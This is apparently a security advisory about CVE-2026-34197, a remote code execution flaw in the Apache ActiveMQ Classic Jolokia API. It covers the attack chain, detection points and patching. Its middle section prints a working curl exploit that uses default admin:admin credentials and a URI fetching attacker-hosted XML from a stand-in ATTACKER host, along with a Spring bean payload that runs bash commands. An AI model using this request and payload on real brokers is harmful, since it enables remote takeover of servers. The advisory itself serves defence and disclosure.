Apache ActiveMQ Jolokia API RCE CVE-2026-34197 Added to CISA KEV, April 30 Deadline for Federal Agencies
Contents
CVE-2026-34197 (CVSS 8.8), an RCE vulnerability in Apache ActiveMQ Classic, was disclosed and added to CISA’s KEV (Known Exploited Vulnerabilities, the catalog of flaws confirmed to be exploited in the wild) on April 16, 2026.
Federal Civilian Executive Branch (FCEB) agencies are required to patch by April 30, 2026. Active exploitation has been confirmed, so any organization exposing ActiveMQ to the internet needs to act immediately.
The bug was discovered by Horizon3.ai researcher Naveen Sunkavally with help from Claude AI, and had been sitting in the codebase for 13 years.
AI-assisted vulnerability discovery continues the trend seen in Claude Code finding a 23-year-old Linux kernel NFS bug and Claude Mythos Preview unearthing thousands of zero-days. AI’s ability to trace paths across multiple components without the usual tunnel vision lands hits on long-sitting bugs in real-world products.
Recent KEV additions are summarized in 7 CVEs added to CISA KEV on April 13 — useful as a reference for your inventory check.
Vulnerability Overview
| Item | Detail |
|---|---|
| CVE ID | CVE-2026-34197 |
| CVSS Score | 8.8 (HIGH) |
| CVSS Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-20 (Improper Input Validation), CWE-94 (Code Injection) |
| Affected Product | Apache ActiveMQ Classic (Artemis is not affected) |
| Affected Versions | Below 5.19.4, 6.0.0–6.2.2 |
| Fixed Versions | 5.19.4, 6.2.3 |
| KEV Added | April 16, 2026 |
| FCEB Deadline | April 30, 2026 |
Reading the CVSS vector: exploitable over the network (AV:N), low attack complexity (AC:L), a low-privileged account is enough (PR:L). No user interaction required (UI:N), and full compromise of confidentiality, integrity, and availability on success (C:H/I:H/A:H).
In other words, if a login gets through from the internet side, it’s game over. Environments still using default credentials will fall with a single shot.
Versions 6.0.0–6.1.1 also have a separate flaw, CVE-2024-32114 — a misconfiguration that exposes the Jolokia API and the web console without authentication.
Combine that range with CVE-2026-34197 and you get an unauthenticated RCE. From the attacker’s view, it becomes “no login needed, remote command execution straight through.”
Background: The ActiveMQ Cast
Before walking through the attack chain, let’s line up the components.
ActiveMQ Classic
Apache Foundation’s JMS (Java Message Service) implementation. Widely used for async communication between microservices, batch queues, and event buses. Its successor ActiveMQ Artemis is a separate codebase and not affected here.
JMX (Java Management Extensions)
A Java API framework for management and monitoring. Broker operations, connection management, and metrics are exposed as MBeans (managed beans). MBeans are identified as domain:type=kind,attribute=value. An ActiveMQ broker looks like org.apache.activemq:type=Broker,brokerName=localhost.
Jolokia
An OSS library that bridges JMX to HTTP/JSON. JMX is RMI-based and awkward to use, so Jolokia lets you hit it like a REST API. ActiveMQ mounts it at /api/jolokia/ by default. You POST JSON specifying type (read/write/exec etc.), mbean, operation, and arguments.
VM Transport
An in-process transport in ActiveMQ. The URI form vm://brokerName starts and connects to a broker inside the same JVM. It’s meant for client code, not for external callers.
Spring xbean scheme
ActiveMQ configuration can be written as a Spring XML context. Using the xbean: URL scheme tells Spring to load bean definitions from the given URL and instantiate them.
Originally designed for local files (xbean:activemq.xml), but the implementation accepts any URL handler, including HTTP.
The Attack
The vulnerability sits in the MBean operation addNetworkConnector(String) reachable via Jolokia.
Network connectors are meant for linking ActiveMQ brokers together — you pass a URI and it connects to that broker.
The problem shows up when you pass a URI combining VM transport + Spring xbean scheme.
flowchart TD
A[Attacker] --> B[POST /api/jolokia/<br/>addNetworkConnector operation]
B --> C[VM transport URI<br/>vm://rce?brokerConfig=xbean:http://attacker/payload.xml]
C --> D[BrokerFactory.createBroker resolves<br/>the brokerConfig URL]
D --> E[xbean: scheme fetches<br/>the Spring XML context]
E --> F[Spring instantiates<br/>every bean definition]
F --> G[MethodInvokingFactoryBean<br/>calls Runtime.exec]
G --> H[Arbitrary command execution<br/>on the broker's JVM]The exploit request is standard Jolokia JSON RPC — nothing special.
curl -X POST http://TARGET:8161/api/jolokia/ \
-H "Content-Type: application/json" \
-u admin:admin \
-d '{
"type": "exec",
"mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
"operation": "addNetworkConnector",
"arguments": ["static:(vm://rce?brokerConfig=xbean:http://ATTACKER:8888/payload.xml)"]
}'The attacker-hosted payload.xml is a Spring bean definition file. Since Spring instantiates all beans on startup, a MethodInvokingFactoryBean planted here triggers Runtime.exec() during bean construction.
<bean id="exec" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
<property name="targetObject">
<bean class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
<property name="targetClass" value="java.lang.Runtime"/>
<property name="targetMethod" value="getRuntime"/>
</bean>
</property>
<property name="targetMethod" value="exec"/>
<property name="arguments">
<list>
<array value-type="java.lang.String">
<value>/bin/bash</value>
<value>-c</value>
<value>COMMAND_HERE</value>
</array>
</list>
</property>
</bean>The command fires during Spring’s bean initialization phase. createBroker later throws a connection error in the logs — but the code has already run.
From a detection standpoint: the shell is spawned before the connection-failure log line is written.
Relation to CVE-2023-46604
CVE-2026-34197 hits the same sink via a different protocol.
| Item | CVE-2023-46604 | CVE-2026-34197 |
|---|---|---|
| Attack Vector | OpenWire protocol (port 61616) | Jolokia HTTP API (port 8161) |
| Authentication | Not required | Required (+CVE-2024-32114 removes it) |
| Attack Steps | Load Spring via forged Exception class | addNetworkConnector → VM transport + xbean: |
| Trigger Point | Spring ClassPathXmlApplicationContext | BrokerFactory.createBroker via Spring xbean: URL |
| End Result | RCE via Spring XML bean construction | RCE via Spring XML bean construction |
Different routes in, identical sink out: “make Spring read remote XML and construct beans.” The 2023 fix closed the OpenWire route but left the Jolokia/JMX route reachable.
CVE-2023-46604 caused real-world damage at scale — HelloKitty ransomware and cryptominer installs were observed. The same exploit tooling carries over easily to CVE-2026-34197, so ransomware operators picking it up is a matter of time.
Why It Went Unnoticed for 13 Years
According to Horizon3.ai’s write-up, each component in the chain (Jolokia API, JMX’s addNetworkConnector, VM transport, Spring xbean context loading) works correctly on its own. The attack path only emerges when they’re connected end-to-end, which makes the bug easy to miss in code review or unit tests.
The researcher used Claude specifically to “stitch together reachable paths end-to-end without preconceptions.” Humans tend to dig deep into the component they own, whereas AI, lacking that bias, has an edge on cross-subsystem composite bugs.
Same pattern as Mythos Preview and Claude Code unearthing classic bugs in OSes and large OSS projects.
Another root cause: the 2022 patch for CVE-2022-41678 (authenticated JDK MBean abuse) ended up over-permitting all ActiveMQ MBean operations, creating fertile ground for the next bug. A past fix seeded the next vulnerability — a familiar pattern.
Impact and Exploitation Status
ActiveMQ Classic tends to sit as core middleware: JMS-based async messaging, microservice event buses, batch queues. It’s usually deep inside the business system stack, so once it’s taken, lateral movement follows directly.
Per SAFE Security’s report, scanning and exploitation activity against Apache ActiveMQ deployments exposing Jolokia management endpoints has already been observed. The massive install base still running default credentials (admin:admin) is what pushes the success rate.
Detection
There are detection points across three layers — ActiveMQ logs, network, and process.
ActiveMQ logs
- POSTs to
/api/jolokia/withaddNetworkConnectorin the body - Connection-attempt logs containing both
vm://andbrokerConfig=xbean:http:// - Stack traces from
BrokerFactoryorxbeanfailing on remote URL resolution
Network
- Unexpected outbound HTTP/HTTPS from the broker JVM
- Suspicious POSTs to port 8161 from outside
Process
- bash/sh/powershell spawned as children of the Java process
- Files dropped in directories the broker normally doesn’t write to
Command execution happens during Spring bean init, so process-creation events land before the connection-failure logs on the timeline. For EDR rules, anchoring on process-creation catches more.
Mitigation
Upgrade (recommended)
- 5.x branch: 5.19.4 or later
- 6.x branch: 6.2.3 or later
The patch removes addNetworkConnector support against VM transport entirely. The reasoning: “dynamically adding a network connection against the VM transport from a remote source was never a legitimate operation.”
Interim measures before upgrading
- Change the default
admin:admincredentials (this alone rescues a lot of deployments) - Block external access to the Jolokia endpoint (typically port 8161) at the network boundary
- Disable the web console if not needed
- On versions 6.0.0–6.1.1, also patch CVE-2024-32114 (removes the no-auth precondition)
- If none of the above are viable, front Jolokia with a WAF or reverse proxy and block requests containing
addNetworkConnector
Direct internet exposure deserves a second look. ActiveMQ Classic is designed for internal networks; there’s no upside to putting management endpoints on the public internet.